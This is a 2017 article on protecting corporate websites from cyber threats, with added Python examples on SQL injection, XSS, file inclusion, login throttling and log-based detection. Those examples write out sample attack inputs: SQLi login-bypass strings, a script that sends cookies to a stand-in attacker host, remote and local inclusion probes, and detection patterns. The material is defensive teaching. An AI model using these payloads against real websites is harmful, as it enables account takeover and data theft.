How To Protect Your Corporate Website From Cyber Threats

By ISBuzz Team, August 7, 2017. 7 min read.

Dismissing the protection of your corporate website from cyber threats as a waste of time only shows that you have not yet seen what such negligence can cost.

Think of a corporate website as the business card you hand to potential customers, investors and business partners. Nobody hands out a card full of typos, blurry lettering and wet ink that leaves the recipient's hands dirty. Why, then, do business owners strike from their agenda the risk that visitors to their website will be exposed to cyber threats?

One reason for this negligence is that owners of non-e-commerce websites are often unaware of the business risk, despite the efforts of information security consultants to burst this bubble of ignorance. Too often corporate decision-makers believe their assets are of no interest to cyber criminals, or they fail to see any connection between website security and business success.

The flipside of poor website security

The reasons to take website security seriously are many:

  • Website outage or ransomware. This is the least damaging outcome, but still a harmful one. Attackers may take a website down or deface it for its own sake, or encrypt its content and demand a ransom in exchange for the decryption key.
  • Security risks for visitors. Attackers can abuse a compromised corporate website to steal visitors' personally identifiable information (payment card data, login credentials and so on) or to push malware to their browsers.
  • Security risks for other businesses, public bodies and government sites. A compromised website can become a staging point for attacks on the company's business partners. The textbook example is the 2013 "watering hole" attack that hit Facebook, Twitter, Microsoft and Apple. The peculiarity of this kind of attack is that it targets particular organizations: the attackers compromise a website that employees of those organizations visit frequently (in 2013, a forum for mobile app developers), plant malware there and wait. Shortly afterwards, some of the visitors from the targeted organizations are infected as well.

Sometimes a small corporate website infected with malware becomes part of a botnet of thousands of machines, which together can be turned against critical infrastructure.

  • The threat of being blacklisted by Google. This happens when a corporate website becomes part of a botnet or hosts malicious content used, for example, in phishing scams. Once Google Safe Browsing flags the site, browsers warn visitors away and search results carry a warning; the site loses thousands of visitors and, with them, potential customers.
  • Reputation damage. This is probably the main reason to protect a corporate website. Website visitors are often more security-savvy than website owners, and they know that corporate websites are frequently insecure. Once a site has been hacked, it takes a long time to win back a clean reputation.

Major website security vulnerabilities

Website security rests on two things, secure software and sound access control, so the major website vulnerabilities are found in those two areas.

Software vulnerabilities

  • SQL Injection (SQLi)

The Open Web Application Security Project (OWASP) ranks injection among the most critical web application risks. SQLi is a vulnerability in which the attacker supplies not the data a website expects but SQL fragments that the website backend concatenates into a query and the database then executes. The attacker enters these strings through any input that reaches a query: URL parameters, search boxes or sign-in forms. A successful injection gives the perpetrator access to the website's database, which in turn opens further opportunities: reading sensitive data (user names, password hashes), modifying the database or, depending on the privileges of the database account, performing admin-level operations.
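The following example, added to this article and not part of the original text, shows the mechanism described above in runnable form: a login query built by string concatenation is bypassed by two classic payloads, while the same query written with bound parameters is not. The user table, the account and the payloads are constructed for the example; the database is an in-memory SQLite instance so it runs offline.

```python
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with one account (example data, not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    # Plaintext password only to keep the injection demo short; real systems store a salted hash.
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Builds the query by string formatting: whatever the user types becomes part of the SQL text."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Parameterised query: values travel separately from the SQL text and are never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Two classic payloads (constructed). The first comments out the password check (-- starts a
# SQL comment); the second turns the WHERE clause into something that is always true.
COMMENT_PAYLOAD = ("alice' --", "wrong")
TAUTOLOGY_PAYLOAD = ("nobody", "' OR '1'='1")


def demo() -> dict:
    """Run both payloads against both implementations and return what each one gets back."""
    conn = make_db()
    return {
        "vulnerable_comment": login_vulnerable(conn, *COMMENT_PAYLOAD),
        "vulnerable_tautology": login_vulnerable(conn, *TAUTOLOGY_PAYLOAD),
        "safe_comment": login_safe(conn, *COMMENT_PAYLOAD),
        "safe_tautology": login_safe(conn, *TAUTOLOGY_PAYLOAD),
        "safe_real_login": login_safe(conn, "alice", "S3cret!"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:22s} -> {result}")
```

Both payloads log the attacker in as the admin through the concatenated query and are rejected by the parameterised one, even though the SQL text is otherwise identical. The fix is the placeholder, not input filtering: a blocklist of quotes and keywords is always one encoding trick away from being bypassed.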

  • Cross-Site Scripting (XSS)

XSS allows an attacker to run a malicious script in a victim's browser. Because the script is served from a site the browser trusts, the browser cannot tell that it came from an attacker and executes it with that site's privileges. In this way the attacker can steal sensitive information such as session cookies, change the content of a web page, or use the browser as a stepping stone to deliver malware to the victim's computer.
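The example below is added here and is not part of the original article. It shows a cookie-stealing payload passing straight through a template that inserts untrusted text into the page, the same text neutralised by context-aware output encoding, and why an `href` attribute needs a scheme allowlist on top of encoding (a `javascript:` URL contains no characters that encoding would touch). The attacker inputs and the Content-Security-Policy value are constructed for the example.

```python
import html
import urllib.parse


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted text dropped straight into the HTML body: any <script> in it runs in the visitor's browser."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """HTML-body context: encode &, <, >, \" and ' so the browser renders the text instead of parsing it."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def safe_href(url: str) -> str:
    """Attribute (href) context. Encoding alone is not enough here, because javascript: URLs contain
    no special characters. Strip control characters that browsers ignore inside a scheme, then allow
    only http(s) absolute URLs or site-relative paths; anything else becomes a harmless '#'."""
    cleaned = "".join(ch for ch in url if ord(ch) >= 0x20).strip()
    scheme = urllib.parse.urlsplit(cleaned).scheme.lower()
    if scheme in ("http", "https"):
        return html.escape(cleaned, quote=True)
    if scheme == "" and cleaned.startswith("/") and not cleaned.startswith("//"):
        return html.escape(cleaned, quote=True)
    return "#"


def render_link_safe(url: str, text: str) -> str:
    """Link rendering that applies the right defence to each context (URL allowlist, then encoding)."""
    return f'<a href="{safe_href(url)}">{html.escape(text, quote=True)}</a>'


# Content-Security-Policy as a second line of defence: if an encoding bug slips through,
# the browser still refuses inline scripts and scripts from foreign origins. (Assumed policy.)
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
)

# Constructed attacker inputs (example data, not from the article).
COOKIE_THEFT = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
JS_URL = "JavaScript:alert(document.cookie)"
SPLIT_SCHEME = "java\tscript:alert(1)"  # tab inside the scheme; browsers still treat it as javascript:


if __name__ == "__main__":
    print(render_comment_vulnerable(COOKIE_THEFT))
    print(render_comment_safe(COOKIE_THEFT))
    print(render_link_safe(JS_URL, "click me"))
    print(render_link_safe("https://example.com/?a=1&b=2", "ok"))
```

The point a practitioner should take from this is that there is no single "escape" function: the body of a page, an attribute value and a URL each need their own treatment, and the CSP header is what limits the damage when one of them is missed.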

  • Inclusion vulnerabilities

There are two types of inclusion vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI). Both arise when an application builds the path of a file to include from user-supplied input. With LFI, the attacker makes the server include a file that is already on it, such as a configuration file holding database credentials or, in combination with an upload feature, a script the attacker placed there earlier. With RFI, the attacker makes the server fetch and include a file hosted on a remote server under the attacker's control. Both let cyber criminals read sensitive data or execute malicious code on the target server.
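As an added example (not from the original article), here is a page-include routine hardened against both LFI and RFI. It appends the file extension server-side, rejects remote URLs and null bytes, and checks the fully resolved path against the page directory, so `..` segments and symlinks cannot escape it. The throwaway web root, the pages and the request list are constructed for the demonstration.

```python
import tempfile
from pathlib import Path
from typing import Dict, Optional


def safe_include_path(root: Path, page: str) -> Optional[Path]:
    """Return the file to include for ?page=<page>, or None if the request escapes the page directory.
    The containment check runs on the fully resolved path, so '..' and symlinks cannot sneak out."""
    if "\x00" in page or "://" in page:            # null-byte truncation tricks and remote URLs (RFI)
        return None
    base = root.resolve()
    candidate = (base / f"{page}.html").resolve()   # extension appended here, never taken from the user
    if base not in candidate.parents:               # local traversal (LFI): resolved path must stay under base
        return None
    return candidate


# Requests a visitor and an attacker might send (constructed for this example).
REQUESTS = [
    "home",                            # legitimate
    "../secret",                       # traversal to a file one level up
    "../../../../etc/passwd",          # classic LFI probe
    "/etc/passwd",                     # absolute path; Path joining would otherwise replace the root
    "http://attacker.example/shell",   # RFI attempt
    "home\x00",                        # null byte that once truncated the appended extension in PHP
]


def demo() -> Dict[str, Optional[str]]:
    """Build a throwaway web root with one page inside it and one secret outside, then show which
    requests actually reach a file. Everything is created in a temporary directory and removed again."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "pages"
        root.mkdir()
        (root / "home.html").write_text("<h1>Home</h1>")
        (Path(tmp) / "secret.html").write_text("db_password=hunter2")   # exists, but outside the page root
        results: Dict[str, Optional[str]] = {}
        for page in REQUESTS:
            path = safe_include_path(root, page)
            results[page] = path.read_text() if path is not None and path.is_file() else None
        return results


if __name__ == "__main__":
    for request, content in demo().items():
        print(f"{request!r:36s} -> {content}")
```

Only the legitimate request returns content; the `../secret` case is instructive because the target file really exists and is still refused, which is what the containment check adds over a simple "does the file exist" test. Where the set of includable pages is small and fixed, an explicit allowlist of names is simpler still and should be preferred.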

Access control vulnerability

Administrative interfaces of corporate websites and web content management systems (WCMS) are prime targets for brute force attacks, in which an attacker gains unauthorized access by trying password after password, often from lists of leaked or default credentials. Once logged in, the criminal can view, change or delete content and perform administrative functions.

Website protection tips

Your corporate website's security signals to customers that your company is reliable. Build it using the following website protection tips.

Enforce access control

This is the number-one best practice. It means enforcing strong passwords, limiting session lifetime, and limiting the number of login attempts, for example by locking an account or throttling a source address after repeated failures. Where the CMS supports it, multi-factor authentication for administrator accounts closes the gap that a guessed or stolen password leaves.
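The class below is an added example, not code from the original article, implementing the "limit the number of login attempts" part of this tip against the brute force scenario described under access control vulnerabilities. It counts failures per account and per source address over a sliding window, locks either key once the limit is reached, and accepts an injectable clock so the behaviour can be checked without waiting. The thresholds and the addresses used in the demonstration are assumed values.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class LoginThrottle:
    """Tracks failed logins per account and per source address. After max_failures inside window_s
    seconds, that key is locked for lockout_s seconds. A successful login clears the account counter.
    Locking both keys means a single address cannot spray many accounts, and a single account cannot
    be attacked from many addresses, without tripping one of the two limits."""

    def __init__(self, max_failures: int = 5, window_s: float = 300, lockout_s: float = 900,
                 clock: Callable[[], float] = time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.clock = clock
        self._failures: Dict[str, Deque[float]] = defaultdict(deque)
        self._locked_until: Dict[str, float] = {}

    def _prune(self, key: str, now: float) -> Deque[float]:
        """Drop failures older than the window so slow, spaced-out attempts do not accumulate forever."""
        q = self._failures[key]
        while q and now - q[0] > self.window_s:
            q.popleft()
        return q

    def is_locked(self, key: str) -> bool:
        return self._locked_until.get(key, 0.0) > self.clock()

    def allow(self, username: str, ip: str) -> bool:
        """Call before verifying the password. Both the account and the source address must be unlocked."""
        return not (self.is_locked(f"user:{username}") or self.is_locked(f"ip:{ip}"))

    def record(self, username: str, ip: str, success: bool) -> None:
        """Call after the password check with its outcome."""
        now = self.clock()
        if success:
            self._failures.pop(f"user:{username}", None)
            return
        for key in (f"user:{username}", f"ip:{ip}"):
            q = self._prune(key, now)
            q.append(now)
            if len(q) >= self.max_failures:
                self._locked_until[key] = now + self.lockout_s
                q.clear()


if __name__ == "__main__":
    # Constructed scenario: three wrong passwords for "admin" from a documentation address.
    throttle = LoginThrottle(max_failures=3, window_s=60, lockout_s=120)
    for _ in range(3):
        throttle.record("admin", "203.0.113.7", success=False)
    print("admin from 203.0.113.7 allowed:", throttle.allow("admin", "203.0.113.7"))   # False
    print("bob from 203.0.113.7 allowed:  ", throttle.allow("bob", "203.0.113.7"))     # False
    print("bob from 198.51.100.2 allowed: ", throttle.allow("bob", "198.51.100.2"))    # True
```

Two details matter in practice: the response to a locked account should look exactly like a wrong password (same status, same timing) so the lock does not leak which user names exist, and the state should live in a shared store such as a database or cache when the site runs on more than one server, otherwise each node keeps its own count and the limit is multiplied by the number of nodes.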

Keep it updated

To prevent break-ins, follow the security advisories for your web platform, CMS, plugins and server software, and apply patches promptly. Many published website vulnerabilities, SQLi and XSS among them, are fixed precisely by such updates, but patches only cover the vendor's code: flaws in the code your own team wrote must be found and fixed by that team.

Employ penetration testing

This method belongs to the field of ethical hacking and finds vulnerabilities before a real attacker can exploit them. It should be a compulsory element of any website security maintenance schedule, performed at least once a year and after any major change to the site.

Install a web application firewall (WAF)

A WAF inspects web traffic to spot suspicious activity and block illegitimate traffic (spammers, malicious bots) and common attack patterns (XSS and SQL injection). Treat it as an extra layer: a WAF filters noise and buys time, but it does not replace fixing the vulnerable code behind it.

Connect a corporate website to a SIEM system

A properly tuned SIEM system is a powerful security tool that offers many ways to monitor and enhance the security of your corporate website, something an out-of-the-box SIEM deployment cannot provide. Usually a corporate website is hosted in the cloud while the SIEM runs on premises; in that case a VPN channel must be established between the cloud environment and the SIEM (an IBM QRadar deployment, for example) so that logs can be collected. Here are the must-haves of a SIEM implementation for website security:

Scan your website for vulnerabilities using external web services. This mimics an attacker's reconnaissance. To do this, the SIEM solution should integrate vulnerability scanners that scan the website from outside, the way an attacker sees it.

Collect website access logs. Make sure the SIEM is tuned to collect web server access logs promptly and to run SQLi, XSS and brute-force detection rules over them.

Collect logs from the operating system. An attacker who compromises a website may obtain OS-level access as well. By monitoring OS logs (new processes, new accounts, file changes under the web root), the SIEM can detect suspicious activity on the host.

Monitor DMZ traffic. The DMZ (demilitarized zone) is where the web servers sit: a buffer zone between the corporate network and the Internet. Every DMZ element that produces logs (firewalls, reverse proxies, load balancers) can feed the SIEM. If cyber criminals manage to compromise the corporate website, their next move is into the corporate network, and the DMZ logs are where that movement first shows up.
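To make the "collect website access logs" item concrete, here is an added example (not from the original article or any SIEM vendor) of the three detections named there running over a constructed access log in the Apache/Nginx combined format. It URL-decodes each request before matching, because attackers encode their payloads precisely to slip past naive string checks, and it raises a brute-force alert when one address accumulates a threshold of failed POSTs to a login path inside a sliding window. The log lines, the login paths and the thresholds are all constructed or assumed for the example.

```python
import re
import urllib.parse
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional

# Constructed access log in "combined" format (example data, not from the article).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Aug/2017:10:15:01 +0000] "GET /products?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Aug/2017:10:15:03 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9031 "-" "sqlmap/1.1"
198.51.100.2 - - [07/Aug/2017:10:16:10 +0000] "GET /search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 211 "-" "Mozilla/5.0"
192.0.2.9 - - [07/Aug/2017:10:20:01 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
192.0.2.9 - - [07/Aug/2017:10:20:02 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
192.0.2.9 - - [07/Aug/2017:10:20:03 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
192.0.2.9 - - [07/Aug/2017:10:20:04 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
192.0.2.9 - - [07/Aug/2017:10:20:05 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
192.0.2.9 - - [07/Aug/2017:10:20:06 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.18"
198.51.100.2 - - [07/Aug/2017:10:25:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Deliberately small signature sets; a production rule base is larger, but the shape is the same.
SQLI_RE = re.compile(r"('\s*or\s*'|union\s+select|sleep\s*\(|;\s*drop\s|--\s*$)")
XSS_RE = re.compile(r"(<script|onerror\s*=|onload\s*=|javascript:)")
LOGIN_PATHS = {"/wp-login.php", "/admin/login", "/user/login"}   # assumed for this site


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line into a record, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Decode before matching: the payload in the log is URL-encoded, the signatures are not.
    rec["decoded"] = urllib.parse.unquote_plus(rec["target"]).lower()
    return rec


def analyse(log_text: str, bf_threshold: int = 5, bf_window_s: int = 60) -> List[Dict]:
    """Return one alert per SQLi/XSS hit and one per address that crosses the brute-force threshold."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    records.sort(key=lambda r: r["ts"])
    alerts: List[Dict] = []
    failures: Dict[str, deque] = defaultdict(deque)
    already_alerted = set()
    for rec in records:
        if SQLI_RE.search(rec["decoded"]):
            alerts.append({"rule": "sqli", "ip": rec["ip"], "detail": rec["target"]})
        if XSS_RE.search(rec["decoded"]):
            alerts.append({"rule": "xss", "ip": rec["ip"], "detail": rec["target"]})
        path = rec["target"].split("?", 1)[0]
        if rec["method"] == "POST" and path in LOGIN_PATHS and rec["status"] in (401, 403):
            q = failures[rec["ip"]]
            q.append(rec["ts"])
            while (rec["ts"] - q[0]).total_seconds() > bf_window_s:   # sliding window
                q.popleft()
            if len(q) >= bf_threshold and rec["ip"] not in already_alerted:
                already_alerted.add(rec["ip"])
                alerts.append({"rule": "brute_force", "ip": rec["ip"],
                               "detail": f"{len(q)} failed logins within {bf_window_s}s"})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

Run against the sample, this produces exactly three alerts: the SQL tautology probe from 203.0.113.7, the script injection attempt from 198.51.100.2, and the password-guessing burst from 192.0.2.9; the successful login (status 302) from 198.51.100.2 is correctly ignored. The same logic expressed as SIEM correlation rules is what the "fine-tuning" in this section refers to.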

In addition to the tips listed above, don’t neglect the following ones:

  • Hide admin pages from search engine indexing

Unindexed admin pages are harder to discover through a basic web search. Note that listing the admin path in robots.txt advertises it to anyone who reads that file; prefer a noindex response header or meta tag, and in any case protect the admin interface with authentication and address restrictions rather than obscurity.

  • Use SSL/TLS

The Secure Sockets Layer (SSL) protocol and its successor, Transport Layer Security (TLS), encrypt communication between the web browser and the web server, turning the HTTP address into HTTPS. SSL itself is obsolete and should be disabled: deploy a certificate from a trusted certificate authority, enable only TLS 1.2 or later, and send an HTTP Strict Transport Security (HSTS) header so browsers refuse to fall back to plain HTTP.

  • Schedule backups

Back up your entire website's data daily, weekly or monthly; choose the schedule based on data volume, update frequency and daily traffic. You can back up manually to a separate local computer or to cloud storage, or use automated backup services such as Backup Machine, CodeGuard and Dropmysite. Keep at least one copy out of reach of the web server's own credentials, so that an attacker who encrypts the site cannot encrypt the backups too, and test a restore periodically: an untested backup is not a backup.

Don’t miss anything

Remember: if your website brings value to you and interests your customers, attackers will also find something there to line their pockets. A single vulnerability is enough to compromise a website, so it is important to use every protection method listed above.

About Dmitry Nikolaenya
